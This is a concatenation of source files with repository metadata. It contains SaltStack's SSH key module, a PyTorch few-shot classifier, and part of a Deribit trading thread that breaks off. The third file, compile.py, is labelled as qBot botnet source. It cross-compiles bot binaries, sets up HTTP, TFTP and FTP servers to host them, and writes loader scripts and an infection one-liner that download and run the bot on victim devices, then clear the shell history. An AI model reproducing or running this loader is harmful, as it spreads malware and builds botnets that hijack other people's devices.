                list(s_keys.keys())
            )
        # Due to the ability for a single file to have multiple keys, it's
        # possible for a single call to this function to have both "replace"
        # and "new" as possible valid returns. I ordered the following as I
        # thought best.
        if 'fail' in rval:
            return 'fail'
        elif 'replace' in rval:
            return 'replace'
        elif 'new' in rval:
            return 'new'
        else:
            return 'no change'
def set_auth_key(
        user,
        key,
        enc='ssh-rsa',
        comment='',
        options=None,
        config='.ssh/authorized_keys',
        cache_keys=None):
    '''
    Add a key to the authorized_keys file. The "key" parameter must only be the
    string of text that is the encoded key. If the key begins with "ssh-rsa"
    or ends with user@host, remove those from the key before passing it to this
    function.

    Returns 'invalid', 'fail', 'replace', 'no change' or 'new'.

    CLI Example:

    .. code-block:: bash

        salt '*' ssh.set_auth_key <user> '<key>' enc='dsa'
    '''
    if cache_keys is None:
        cache_keys = []
    if len(key.split()) > 1:
        # key material must be a single token — whitespace means the
        # caller passed a full authorized_keys line
        return 'invalid'
    enc = _refine_enc(enc)
    uinfo = __salt__['user.info'](user)
    if not uinfo:
        return 'fail'
    status = check_key(user, key, enc, comment, options, config, cache_keys)
    if status == 'update':
        _replace_auth_key(user, key, enc, comment, options or [], config)
        return 'replace'
    elif status == 'exists':
        return 'no change'
    else:
        auth_line = _format_auth_line(key, enc, comment, options)
        fconfig = _get_config_file(user, config)
        # Fail if the key lives under the user's homedir, and the homedir
        # doesn't exist
        udir = uinfo.get('home', '')
        if fconfig.startswith(udir) and not os.path.isdir(udir):
            return 'fail'
        if not os.path.isdir(os.path.dirname(fconfig)):
            dpath = os.path.dirname(fconfig)
            os.makedirs(dpath)
            if os.geteuid() == 0:
                os.chown(dpath, uinfo['uid'], uinfo['gid'])
            # 448 == 0o700
            os.chmod(dpath, 448)
            # If SELINUX is available run a restorecon on the file
            rcon = salt.utils.which('restorecon')
            if rcon:
                cmd = [rcon, dpath]
                subprocess.call(cmd)
        if not os.path.isfile(fconfig):
            new_file = True
        else:
            new_file = False
        try:
            with salt.utils.fopen(fconfig, 'a+') as _fh:
                if new_file is False:
                    # Let's make sure we have a new line at the end of the file
                    # NOTE(review): seeking +1024 past EOF makes read()
                    # return '' so a '\n' is always appended — was
                    # seek(-1024, 2) intended? confirm
                    _fh.seek(1024, 2)
                    if not _fh.read(1024).rstrip(' ').endswith('\n'):
                        _fh.seek(0, 2)
                        _fh.write('\n')
                _fh.write('{0}'.format(auth_line))
        except (IOError, OSError) as exc:
            msg = 'Could not write to key file: {0}'
            raise CommandExecutionError(msg.format(str(exc)))
        if new_file:
            if os.geteuid() == 0:
                os.chown(fconfig, uinfo['uid'], uinfo['gid'])
            # 384 == 0o600
            os.chmod(fconfig, 384)
            # If SELINUX is available run a restorecon on the file
            rcon = salt.utils.which('restorecon')
            if rcon:
                cmd = [rcon, fconfig]
                subprocess.call(cmd)
        return 'new'
def _parse_openssh_output(lines):
    '''
    Helper function which parses ssh-keygen -F and ssh-keyscan function
    output and yields a dict with key information, one per valid line.
    Comment lines, malformed lines and keys that are not valid base64 are
    skipped.
    '''
    for raw in lines:
        if raw.startswith('#'):
            # ssh-keyscan progress/comment line
            continue
        fields = raw.split()
        if len(fields) != 3:
            # incorrect format
            continue
        hostname, enc, key = fields
        fingerprint = _fingerprint(key)
        if fingerprint:
            yield {'hostname': hostname, 'key': key, 'enc': enc,
                   'fingerprint': fingerprint}
@decorators.which('ssh-keygen')
def get_known_host(user, hostname, config=None, port=None):
    '''
    Return information about known host from the configfile, if any.
    If there is no such key, return None.

    CLI Example:

    .. code-block:: bash

        salt '*' ssh.get_known_host <user> <hostname>
    '''
    full = _get_known_hosts_file(config=config, user=user)
    if isinstance(full, dict):
        # error dict from _get_known_hosts_file; propagate it as-is
        return full
    ssh_hostname = _hostname_and_port_to_ssh_hostname(hostname, port)
    # ssh-keygen -F prints the matching known_hosts entries
    cmd = ['ssh-keygen', '-F', ssh_hostname, '-f', full]
    lines = __salt__['cmd.run'](cmd,
                                ignore_retcode=True,
                                python_shell=False).splitlines()
    known_hosts = list(_parse_openssh_output(lines))
    return known_hosts[0] if known_hosts else None
@decorators.which('ssh-keyscan')
def recv_known_host(hostname,
                    enc=None,
                    port=None,
                    hash_hostname=True,
                    hash_known_hosts=True,
                    timeout=5):
    '''
    Retrieve information about host public key from remote server

    hostname
        The name of the remote host (e.g. "github.com")

    enc
        Defines what type of key is being used, can be ed25519, ecdsa ssh-rsa
        or ssh-dss

    port
        optional parameter, denoting the port of the remote host, which will be
        used in case, if the public key will be requested from it. By default
        the port 22 is used.

    hash_hostname : True
        Hash all hostnames and addresses in the known hosts file.

        .. deprecated:: Carbon
            Please use hash_known_hosts instead.

    hash_known_hosts : True
        Hash all hostnames and addresses in the known hosts file.

    timeout : int
        Set the timeout for connection attempts.  If ``timeout`` seconds have
        elapsed since a connection was initiated to a host or since the last
        time anything was read from that host, then the connection is closed
        and the host in question considered unavailable.  Default is 5 seconds.

        .. versionadded:: Boron

    CLI Example:

    .. code-block:: bash

        salt '*' ssh.recv_known_host <hostname> enc=<enc> port=<port>
    '''
    if not hash_hostname:
        salt.utils.warn_until(
            'Carbon',
            'The hash_hostname parameter is misleading as ssh-keygen can only '
            'hash the whole known hosts file, not entries for individual '
            'hosts. Please use hash_known_hosts=False instead.')
        hash_known_hosts = hash_hostname
    # The following list of OSes have an old version of openssh-clients
    # and thus require the '-t' option for ssh-keyscan
    need_dash_t = ('CentOS-5',)
    cmd = ['ssh-keyscan']
    if port:
        # NOTE(review): port is passed through unconverted here (unlike
        # timeout below) — presumably cmd.run stringifies argv; confirm
        cmd.extend(['-p', port])
    if enc:
        cmd.extend(['-t', enc])
    if not enc and __grains__.get('osfinger') in need_dash_t:
        cmd.extend(['-t', 'rsa'])
    if hash_known_hosts:
        cmd.append('-H')
    cmd.extend(['-T', str(timeout)])
    cmd.append(hostname)
    lines = __salt__['cmd.run'](cmd, python_shell=False).splitlines()
    known_hosts = list(_parse_openssh_output(lines))
    return known_hosts[0] if known_hosts else None
def check_known_host(user=None, hostname=None, key=None, fingerprint=None,
                     config=None, port=None):
    '''
    Check the record in known_hosts file, either by its value or by fingerprint
    (it's enough to set up either key or fingerprint, you don't need to set up
    both).

    If provided key or fingerprint doesn't match with stored value, return
    "update", if no value is found for a given host, return "add", otherwise
    return "exists".

    If neither key, nor fingerprint is defined, then additional validation is
    not performed.

    CLI Example:

    .. code-block:: bash

        salt '*' ssh.check_known_host <user> <hostname> key='AAAA...FAaQ=='
    '''
    if not hostname:
        return {'status': 'error',
                'error': 'hostname argument required'}
    if not user:
        config = config or '/etc/ssh/ssh_known_hosts'
    else:
        config = config or '.ssh/known_hosts'
    known_host = get_known_host(user, hostname, config=config, port=port)
    if not known_host or 'fingerprint' not in known_host:
        # also covers the error-dict case, which has no 'fingerprint'
        return 'add'
    if key:
        return 'exists' if key == known_host['key'] else 'update'
    elif fingerprint:
        return ('exists' if fingerprint == known_host['fingerprint']
                else 'update')
    else:
        return 'exists'
def rm_known_host(user=None, hostname=None, config=None, port=None):
    '''
    Remove all keys belonging to hostname from a known_hosts file.

    Returns a status dict; 'error' when the file cannot be located,
    'removed' (with the ssh-keygen output) otherwise.

    CLI Example:

    .. code-block:: bash

        salt '*' ssh.rm_known_host <user> <hostname>
    '''
    if not hostname:
        return {'status': 'error',
                'error': 'hostname argument required'}
    full = _get_known_hosts_file(config=config, user=user)
    if isinstance(full, dict):
        # error dict from _get_known_hosts_file; propagate it
        return full
    if not os.path.isfile(full):
        return {'status': 'error',
                'error': 'Known hosts file {0} does not exist'.format(full)}
    ssh_hostname = _hostname_and_port_to_ssh_hostname(hostname, port)
    cmd = ['ssh-keygen', '-R', ssh_hostname, '-f', full]
    cmd_result = __salt__['cmd.run'](cmd, python_shell=False)
    # ssh-keygen creates a new file, thus a chown is required.
    if os.geteuid() == 0 and user:
        uinfo = __salt__['user.info'](user)
        os.chown(full, uinfo['uid'], uinfo['gid'])
    return {'status': 'removed', 'comment': cmd_result}
def set_known_host(user=None,
                   hostname=None,
                   fingerprint=None,
                   key=None,
                   port=None,
                   enc=None,
                   hash_hostname=True,
                   config=None,
                   hash_known_hosts=True,
                   timeout=5):
    '''
    Download SSH public key from remote host "hostname", optionally validate
    its fingerprint against "fingerprint" variable and save the record in the
    known_hosts file.

    If such a record does already exists in there, do nothing.

    user
        The user who owns the ssh authorized keys file to modify

    hostname
        The name of the remote host (e.g. "github.com")

    fingerprint
        The fingerprint of the key which must be presented in the known_hosts
        file (optional if key specified)

    key
        The public key which must be presented in the known_hosts file
        (optional if fingerprint specified)

    port
        optional parameter, denoting the port of the remote host, which will be
        used in case, if the public key will be requested from it. By default
        the port 22 is used.

    enc
        Defines what type of key is being used, can be ed25519, ecdsa ssh-rsa
        or ssh-dss

    hash_hostname : True
        Hash all hostnames and addresses in the known hosts file.

        .. deprecated:: Carbon
            Please use hash_known_hosts instead.

    config
        The location of the authorized keys file relative to the user's home
        directory, defaults to ".ssh/known_hosts". If no user is specified,
        defaults to "/etc/ssh/ssh_known_hosts". If present, must be an
        absolute path when a user is not specified.

    hash_known_hosts : True
        Hash all hostnames and addresses in the known hosts file.

    timeout : int
        Set the timeout for connection attempts.  If ``timeout`` seconds have
        elapsed since a connection was initiated to a host or since the last
        time anything was read from that host, then the connection is closed
        and the host in question considered unavailable.  Default is 5 seconds.

        .. versionadded:: Boron

    CLI Example:

    .. code-block:: bash

        salt '*' ssh.set_known_host <user> fingerprint='xx:xx:..:xx' enc='ssh-rsa' config='.ssh/known_hosts'
    '''
    if not hostname:
        return {'status': 'error',
                'error': 'hostname argument required'}
    if not hash_hostname:
        salt.utils.warn_until(
            'Carbon',
            'The hash_hostname parameter is misleading as ssh-keygen can only '
            'hash the whole known hosts file, not entries for individual '
            'hosts. Please use hash_known_hosts=False instead.')
        hash_known_hosts = hash_hostname
    if port is not None and port != DEFAULT_SSH_PORT and hash_known_hosts:
        # a hashed entry cannot carry the [host]:port form
        return {'status': 'error',
                'error': 'argument port can not be used in '
                'conjunction with argument hash_known_hosts'}
    update_required = False
    check_required = False
    stored_host = get_known_host(user, hostname, config, port)
    if not stored_host:
        update_required = True
    elif fingerprint and fingerprint != stored_host['fingerprint']:
        update_required = True
    elif key and key != stored_host['key']:
        update_required = True
    elif key != stored_host['key']:
        # no explicit key given: re-fetch the remote key and compare it
        # against the stored one before deciding
        check_required = True
    if not update_required and not check_required:
        return {'status': 'exists', 'key': stored_host['key']}
    if not key:
        remote_host = recv_known_host(hostname,
                                      enc=enc,
                                      port=port,
                                      hash_known_hosts=hash_known_hosts,
                                      timeout=timeout)
        if not remote_host:
            return {'status': 'error',
                    'error': 'Unable to receive remote host key'}
        if fingerprint and fingerprint != remote_host['fingerprint']:
            return {'status': 'error',
                    'error': ('Remote host public key found but its fingerprint '
                              'does not match one you have provided')}
        if check_required:
            if remote_host['key'] == stored_host['key']:
                return {'status': 'exists', 'key': stored_host['key']}
    # remove everything we had in the config so far
    rm_known_host(user, hostname, config=config)
    # set up new value
    full = _get_known_hosts_file(config=config, user=user)
    if isinstance(full, dict):
        # error dict from _get_known_hosts_file; propagate it
        return full
    if key:
        remote_host = {'hostname': hostname, 'enc': enc, 'key': key}
    if hash_known_hosts or port in [DEFAULT_SSH_PORT, None] or ':' in remote_host['hostname']:
        # hashed entries and default-port (or already [host]:port-shaped)
        # hostnames are written verbatim
        line = '{hostname} {enc} {key}\n'.format(**remote_host)
    else:
        remote_host['port'] = port
        line = '[{hostname}]:{port} {enc} {key}\n'.format(**remote_host)
    # ensure ~/.ssh exists
    ssh_dir = os.path.dirname(full)
    if user:
        uinfo = __salt__['user.info'](user)
    try:
        log.debug('Ensuring ssh config dir "{0}" exists'.format(ssh_dir))
        os.makedirs(ssh_dir)
    except OSError as exc:
        if exc.args[1] == 'Permission denied':
            log.error('Unable to create directory {0}: '
                      '{1}'.format(ssh_dir, exc.args[1]))
        elif exc.args[1] == 'File exists':
            log.debug('{0} already exists, no need to create '
                      'it'.format(ssh_dir))
    else:
        # set proper ownership/permissions
        if user:
            os.chown(ssh_dir, uinfo['uid'], uinfo['gid'])
            os.chmod(ssh_dir, 0o700)
    # write line to known_hosts file
    try:
        with salt.utils.fopen(full, 'a') as ofile:
            ofile.write(line)
    except (IOError, OSError) as exception:
        raise CommandExecutionError(
            "Couldn't append to known hosts file: '{0}'".format(exception)
        )
    if os.geteuid() == 0 and user:
        os.chown(full, uinfo['uid'], uinfo['gid'])
    os.chmod(full, 0o644)
    if key and hash_known_hosts:
        # an explicit key was appended unhashed; hash the whole file now
        cmd_result = __salt__['ssh.hash_known_hosts'](user=user, config=full)
    return {'status': 'updated', 'old': stored_host, 'new': remote_host}
def user_keys(user=None, pubfile=None, prvfile=None):
    '''
    Return the user's ssh keys on the minion

    .. versionadded:: 2014.7.0

    CLI Example:

    .. code-block:: bash

        salt '*' ssh.user_keys
        salt '*' ssh.user_keys user=user1
        salt '*' ssh.user_keys user=user1 pubfile=/home/user1/.ssh/id_rsa.pub prvfile=/home/user1/.ssh/id_rsa
        salt '*' ssh.user_keys user=user1 prvfile=False
        salt '*' ssh.user_keys user="['user1','user2'] pubfile=id_rsa.pub prvfile=id_rsa

    As you can see you can tell Salt not to read from the user's private (or public) key file by setting the
    file path to ``False``. This can be useful to prevent Salt from publishing private data via Salt Mine or
    others.
    '''
    if not user:
        user = __salt__['user.list_users']()
    if not isinstance(user, list):
        # only one so convert to list
        user = [user]
    keys = {}
    for u in user:
        keys[u] = {}
        userinfo = __salt__['user.info'](u)
        if 'home' not in userinfo:
            # no home directory, skip
            continue
        userKeys = []
        if pubfile:
            userKeys.append(pubfile)
        elif pubfile is not False:
            # Add the default public keys
            userKeys += ['id_rsa.pub', 'id_dsa.pub', 'id_ecdsa.pub', 'id_ed25519.pub']
        if prvfile:
            userKeys.append(prvfile)
        elif prvfile is not False:
            # Add the default private keys
            userKeys += ['id_rsa', 'id_dsa', 'id_ecdsa', 'id_ed25519']
        for key in userKeys:
            if key.startswith('/'):
                keyname = os.path.basename(key)
                fn_ = key
            else:
                # if not full path, assume key is in .ssh
                # in user's home directory
                keyname = key
                fn_ = '{0}/.ssh/{1}'.format(userinfo['home'], key)
            if os.path.exists(fn_):
                try:
                    with salt.utils.fopen(fn_, 'r') as _fh:
                        keys[u][keyname] = ''.join(_fh.readlines())
                except (IOError, OSError):
                    # unreadable key file: silently skip it
                    pass
    # clean up any empty items
    _keys = {}
    for key in keys:
        if keys[key]:
            _keys[key] = keys[key]
    return _keys
@decorators.which('ssh-keygen')
def hash_known_hosts(user=None, config=None):
    '''
    Hash all the hostnames in the known hosts file.

    .. versionadded:: 2014.7.0

    user
        hash known hosts of this user

    config
        path to known hosts file: can be absolute or relative to user's home
        directory

    CLI Example:

    .. code-block:: bash

        salt '*' ssh.hash_known_hosts
    '''
    full = _get_known_hosts_file(config=config, user=user)
    if isinstance(full, dict):
        return full  # full contains error information
    if not os.path.isfile(full):
        return {'status': 'error',
                'error': 'Known hosts file {0} does not exist'.format(full)}
    cmd = ['ssh-keygen', '-H', '-f', full]
    cmd_result = __salt__['cmd.run'](cmd, python_shell=False)
    # ssh-keygen creates a new file, thus a chown is required.
    if os.geteuid() == 0 and user:
        uinfo = __salt__['user.info'](user)
        os.chown(full, uinfo['uid'], uinfo['gid'])
    return {'status': 'updated', 'comment': cmd_result}
def _hostname_and_port_to_ssh_hostname(hostname, port=DEFAULT_SSH_PORT):
    # known_hosts uses the bracketed "[host]:port" form only for
    # non-default ports; the plain hostname otherwise.
    if port and port != DEFAULT_SSH_PORT:
        return '[{0}]:{1}'.format(hostname, port)
    return hostname
| 31.535921 | 109 | 0.56177 |
4306426a804a389616a5919b964ad80081e71ea5 | 4,771 | py | Python | src/classifier/routing.py | chengemily/Distributional-Signatures | 7ef96f9cfc8aeb2fb54e117e3968e4390aaad819 | [
"MIT"
] | 243 | 2019-08-15T18:34:09.000Z | 2022-03-31T11:51:00.000Z | src/classifier/routing.py | phymucs/460d60d2c25a118c67dcbfdd37f27d6c | cd7e4659fc9761a8af046e824853aa338b22f2f6 | [
"MIT"
] | 34 | 2019-10-22T08:11:28.000Z | 2022-03-19T08:03:30.000Z | src/classifier/routing.py | phymucs/460d60d2c25a118c67dcbfdd37f27d6c | cd7e4659fc9761a8af046e824853aa338b22f2f6 | [
"MIT"
] | 54 | 2019-08-19T16:11:49.000Z | 2022-03-31T05:36:01.000Z | import torch
import torch.nn as nn
import torch.nn.functional as F
from classifier.base import BASE
class ROUTING(BASE):
    '''
    Induction and Relation module of
    "Induction Networks for Few-Shot Text Classification"

    The induction step builds one prototype per class from the support set
    via capsule-network-style dynamic routing; the relation step scores each
    query against each prototype with a bilinear layer (unless the 'meta'
    embedding is used, in which case a parameter-free L2 comparison is used).
    '''
    def __init__(self, ebd_dim, args):
        # ebd_dim: dimensionality of the input example embeddings
        # args: namespace carrying way/shot/induct_* hyper-parameters
        super(ROUTING, self).__init__(args)
        self.args = args
        self.ebd_dim = ebd_dim
        h = args.induct_hidden_dim
        self.iter = args.induct_iter  # number of dynamic-routing iterations
        if self.args.embedding == 'meta':
            print('No relation module. Use Prototypical network style prediction')
        else: # follow the original paper
            self.Ws = nn.Linear(self.ebd_dim, self.ebd_dim)
            # Bilinear relation tensor; shape (h, 1, 1, ebd_dim, ebd_dim) so it
            # broadcasts against (1, 1, way, 1, ebd_dim) prototypes below.
            self.M = nn.Parameter(torch.Tensor(h, 1, 1, self.ebd_dim, self.ebd_dim).uniform_(-0.1,0.1))
            self.rel = nn.Linear(h, 1)
    def _squash(self, X):
        '''
        Perform squashing over the last dimension
        The dimension remain the same

        Capsule-network squash: rescales each vector to norm in [0, 1)
        while preserving its direction.
        NOTE(review): divides by X_norm — assumes no exactly-zero input
        vector (would produce NaN); confirm upstream embeddings are nonzero.
        '''
        X_norm = torch.norm(X, dim=-1, keepdim=True)
        out = (X_norm ** 2) / (1.0 + X_norm ** 2) / X_norm * X
        return out
    def _compute_prototype(self, XS, YS):
        '''
        Compute the prototype for each class by dynamic routing
        @param XS (support x): support_size x ebd_dim
        @param YS (support y): support_size
        @return prototype: way x ebd_dim

        Assumes the support set contains exactly args.shot examples per
        class, so after sorting by label the rows can be sliced in
        contiguous blocks of size `shot`.
        '''
        # sort YS to make sure classes of the same labels are clustered together
        YS, indices = torch.sort(YS)
        XS = XS[indices]
        # squash
        if self.args.embedding == 'meta':
            # do not transform the matrix to preserve information when
            # distributional signatures are used
            XS_hat = self._squash(XS)
        else:
            # original paper's transformation
            XS_hat = self._squash(self.Ws(XS))
        # b: routing logits, one per (class, support example)
        b = torch.zeros([self.args.way, self.args.shot], device=XS.device)
        prototype = []
        for it in range(self.iter):
            # perform dynamic routing for each class
            d = F.softmax(b, dim=-1)
            new_b = torch.zeros_like(b)
            for i in range(self.args.way):
                # examples belonging to class i
                XS_hat_cur = XS_hat[i*self.args.shot:(i+1)*self.args.shot,:]
                # generate prototypes
                c_hat = torch.sum(d[i, :].unsqueeze(1) * XS_hat_cur, dim=0)
                c = self._squash(c_hat)
                # update b
                new_b[i,:] = b[i,:] + (XS_hat_cur @ c.unsqueeze(1)).squeeze(1)
                if it == self.iter-1:
                    # only the final iteration's prototypes are kept
                    prototype.append(c.unsqueeze(0))
            b = new_b
        prototype = torch.cat(prototype, dim=0)
        return prototype
    def _compute_relation_score(self, prototype, XQ):
        '''
        Compute the relation score between each prototype and each query
        example
        @param prototype: way x ebd_dim
        @param XQ: query_size x ebd_dim
        @return score: query_size x way

        Bilinear form prototype^T M XQ evaluated for each of the h slices
        of M, then mapped to (0, 1) by a linear layer + sigmoid.
        '''
        prototype = prototype.unsqueeze(0).unsqueeze(0).unsqueeze(-2)
        # 1, 1, way, 1, ebd_dim
        XQ = XQ.unsqueeze(1).unsqueeze(-1).unsqueeze(0)
        # 1, query_size, 1, ebd_dim, 1
        score = torch.matmul(torch.matmul(prototype, self.M),
                             XQ)
        # h, query_size, way, 1, 1
        score = score.squeeze(-1).squeeze(-1).permute(1, 2, 0)
        # query_size, way, h
        score = F.relu(score)
        score = torch.sigmoid(self.rel(score)).squeeze(-1)
        return score
    def forward(self, XS, YS, XQ, YQ):
        '''
        @param XS (support x): support_size x ebd_dim
        @param YS (support y): support_size
        @param XQ (support x): query_size x ebd_dim
        @param YQ (support y): query_size
        @return acc
        @return loss
        '''
        # re-index labels to 0..way-1 (helper inherited from BASE)
        YS, YQ = self.reidx_y(YS, YQ)
        prototype = self._compute_prototype(XS, YS)
        if self.args.embedding == 'meta':
            # use parameter free comparison when distributional signatures are
            # used
            score = -self._compute_l2(prototype, XQ)
            # score = -self._compute_cos(prototype, XQ)
            # l2 and cos deosn't have much diff empirically across the 6
            # datasets
            loss = F.cross_entropy(score, YQ)
        else:
            # implementation based on the original paper
            score = self._compute_relation_score(prototype, XQ)
            # use regression as training objective
            YQ_onehot = self._label2onehot(YQ)
            loss = torch.sum((YQ_onehot.float() - score) ** 2)
        acc = BASE.compute_acc(score, YQ)
        return acc, loss
| 31.388158 | 103 | 0.559002 |
40964542fdb6760c522e5bebdab2ee6d89f2fa67 | 6,372 | py | Python | compile.py | yassineas/Dream-qBot-Botnet-Source | d76d92776b1995655ef85eba216f5fdffc114b29 | [
"MIT"
] | 14 | 2020-12-22T01:38:02.000Z | 2022-02-08T15:59:39.000Z | compile.py | yassineas/Dream-qBot-Botnet-Source | d76d92776b1995655ef85eba216f5fdffc114b29 | [
"MIT"
] | 2 | 2021-03-02T23:46:05.000Z | 2022-03-16T10:20:48.000Z | compile.py | yassineas/Dream-qBot-Botnet-Source | d76d92776b1995655ef85eba216f5fdffc114b29 | [
"MIT"
] | 8 | 2020-10-08T02:16:19.000Z | 2021-12-31T09:25:30.000Z | import subprocess, sys
if len(sys.argv[2]) != 0:
ip = sys.argv[2]
else:
print("\x1b[0;31mIncorrect Usage!")
print("\x1b[0;32mUsage: python " + sys.argv[0] + " <BOTNAME.C> <IPADDR> \x1b[0m")
exit(1)
bot = sys.argv[1]
SNOOPY= raw_input("Y/n Get Arch-")
if SNOOPY.lower() == "y":
get_arch = True
else:
get_arch = False
compileas = ["m-i.p-s.ISIS" ,
"m-p.s-l.ISIS" ,
"s-h.4-.ISIS",
"x-8.6-.ISIS",
"a-r.m-6.ISIS",
"x-3.2-.ISIS",
"a-r.m-7.ISIS",
"p-p.c-.ISIS",
"i-5.8-6.ISIS",
"m-6.8-k.ISIS",
"p-p.c-.ISIS",
"a-r.m-4.ISIS" ,
"a-r.m-5.ISIS"]
getarch = ['http://uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-mips.tar.bz2',
'http://uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-mipsel.tar.bz2',
'http://uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-sh4.tar.bz2',
'http://uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-x86_64.tar.bz2',
'http://distro.ibiblio.org/slitaz/sources/packages/c/cross-compiler-armv6l.tar.bz2',
'http://uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-i686.tar.bz2',
'http://uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-powerpc.tar.bz2',
'http://uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-i586.tar.bz2',
'http://uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-m68k.tar.bz2',
'https://uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-armv4l.tar.bz2',
'https://uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-armv5l.tar.bz2']
ccs = ["cross-compiler-mips",
"cross-compiler-mipsel",
"cross-compiler-sh4",
"cross-compiler-x86_64",
"cross-compiler-armv6l",
"cross-compiler-i686",
"cross-compiler-powerpc",
"cross-compiler-i586",
"cross-compiler-m68k",
"cross-compiler-armv7l",
"cross-compiler-armv4l",
"cross-compiler-armv4l",
"cross-compiler-armv5l"]
def run(cmd):
subprocess.call(cmd, shell=True)
run("rm -rf /var/www/html/* /var/lib/tftpboot/* /var/ftp/*")
if get_arch == True:
run("rm -rf cross-compiler-*")
print("Downloading Architectures")
for arch in getarch:
run("wget " + arch + " --no-check-certificate >> /dev/null")
run("tar -xvf *tar.bz2")
run("rm -rf *tar.bz2")
print("Cross Compilers Downloaded...")
num = 0
for cc in ccs:
arch = cc.split("-")[2]
run("./"+cc+"/bin/"+arch+"-gcc -static -pthread -D" + arch.upper() + " -o " + compileas[num] + " " + bot + " > /dev/null")
num += 1
print("Cross Compiling Done!")
print("Setting up your httpd and tftp")
run("yum install httpd -y")
run("service httpd start")
run("yum install xinetd tftp tftp-server -y")
run("yum install vsftpd -y")
run("service vsftpd start")
run('''echo -e "# default: off
# description: The tftp server serves files using the trivial file transfer \
# protocol. The tftp protocol is often used to boot diskless \
# workstations, download configuration files to network-aware printers, \
# and to start the installation process for some operating systems.
service tftp
{
socket_type = dgram
protocol = udp
wait = yes
user = root
server = /usr/sbin/in.tftpd
server_args = -s -c /var/lib/tftpboot
disable = no
per_source = 11
cps = 100 2
flags = IPv4
}
" > /etc/xinetd.d/tftp''')
run("service xinetd start")
run('''echo -e "listen=YES
local_enable=NO
anonymous_enable=YES
write_enable=NO
anon_root=/var/ftp
anon_max_rate=2048000
xferlog_enable=YES
listen_address='''+ ip +'''
listen_port=21" > /etc/vsftpd/vsftpd-anon.conf''')
run("service vsftpd restart")
for i in compileas:
run("cp " + i + " /var/www/html")
run("cp " + i + " /var/ftp")
run("mv " + i + " /var/lib/tftpboot")
run('echo -e "#!/bin/bash" > /var/lib/tftpboot/tftp1.sh')
run('echo -e "ulimit -n 1024" >> /var/lib/tftpboot/tftp1.sh')
run('echo -e "cp /bin/busybox /tmp/" >> /var/lib/tftpboot/tftp1.sh')
run('echo -e "#!/bin/bash" > /var/lib/tftpboot/tftp2.sh')
run('echo -e "ulimit -n 1024" >> /var/lib/tftpboot/tftp2.sh')
run('echo -e "cp /bin/busybox /tmp/" >> /var/lib/tftpboot/tftp2.sh')
run('echo -e "#!/bin/bash" > /var/www/html/ISIS.sh')
for i in compileas:
run('echo -e "cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://' + ip + '/' + i + '; chmod +x ' + i + '; ./' + i + '; rm -rf ' + i + '" >> /var/www/html/ISIS.sh')
run('echo -e "cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; ftpget -v -u anonymous -p anonymous -P 21 ' + ip + ' ' + i + ' ' + i + '; chmod 777 ' + i + ' ./' + i + '; rm -rf ' + i + '" >> /var/ftp/ftp1.sh')
run('echo -e "cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; tftp ' + ip + ' -c get ' + i + ';cat ' + i + ' >badbox;chmod +x *;./badbox" >> /var/lib/tftpboot/tftp1.sh')
run('echo -e "cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; tftp -r ' + i + ' -g ' + ip + ';cat ' + i + ' >badbox;chmod +x *;./badbox" >> /var/lib/tftpboot/tftp2.sh')
run("service xinetd restart")
run("service httpd restart")
run('echo -e "ulimit -n 99999" >> ~/.bashrc')
#USE IF YOU WANT TO print("\x1b[0mYour link: cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://" + ip + "/SnOoPy.sh; chmod 777 SnOoPy.sh; sh SnOoPy.sh; tftp " + ip + " -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g " + ip + "; chmod 777 tftp2.sh; sh tftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 " + ip + " ftp1.sh ftp1.sh; sh ftp1.sh; rm -rf SnOoPy.sh tftp1.sh tftp2.sh ftp1.sh; rm -rf *\x1b[0m")
print("\x1b[1;33mYour link: cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://" + ip + "/ISIS.sh; chmod 777 *; sh ISIS.sh; tftp -g " + ip + " -r tftp1.sh; chmod 777 *; sh tftp1.sh; rm -rf *.sh; history -c")
print("\x1b[1;31m ISIS BOTNET CODED BY KOMODO FOR HIS SON SHY")
print("\x1b[1;32m After you copied your link type 'ls' okay you got that? it is 'LS' but lowercase") | 42.198675 | 444 | 0.566384 |
d91931efc1a8dc9e9617eb6fe7838e2b5b31012c | 1,275 | py | Python | deritradeterminal/threads/orders/LimitBuyThread.py | mrhelloyellow/deri-trade-terminal | a882ac4ae01924a06faf1b92ebe3bfe7110d2105 | [
"MIT"
] | null | null | null | deritradeterminal/threads/orders/LimitBuyThread.py | mrhelloyellow/deri-trade-terminal | a882ac4ae01924a06faf1b92ebe3bfe7110d2105 | [
"MIT"
] | null | null | null | deritradeterminal/threads/orders/LimitBuyThread.py | mrhelloyellow/deri-trade-terminal | a882ac4ae01924a06faf1b92ebe3bfe7110d2105 | [
"MIT"
] | null | null | null | from PyQt5 import *
from PyQt5.QtGui import *
from PyQt5.QtCore import *
from PyQt5.QtWidgets import *
from deritradeterminal.util.deribit_api import RestClient
from deritradeterminal.managers.ConfigManager import ConfigManager
class LimitBuyThread(QThread):
    """Background Qt thread that places a single limit-buy order on Deribit.

    The result (success or failure) is reported back to the UI through the
    ``signeler`` signal as (ok: bool, title: str, message: str).
    """
    signeler = pyqtSignal(bool,str,str)
    def processOrder(self):
        # Place the order and emit the outcome; never raises into the Qt
        # event loop (all exceptions are converted to a failure signal).
        try:
            config = ConfigManager.get_config()
            # tradeApis maps account id -> (api_key, api_secret); presumably —
            # TODO confirm against ConfigManager.
            client = RestClient(config.tradeApis[self.accountid][0], config.tradeApis[self.accountid][1], ConfigManager.get_config().apiUrl)
            # NOTE(review): get_config() is called again twice below although
            # `config` already holds it; also 'tradeInsturment' is the actual
            # attribute name in the project config (typo preserved upstream).
            client.buy(ConfigManager.get_config().tradeInsturment, float(self.amount), float(self.price), "limit")
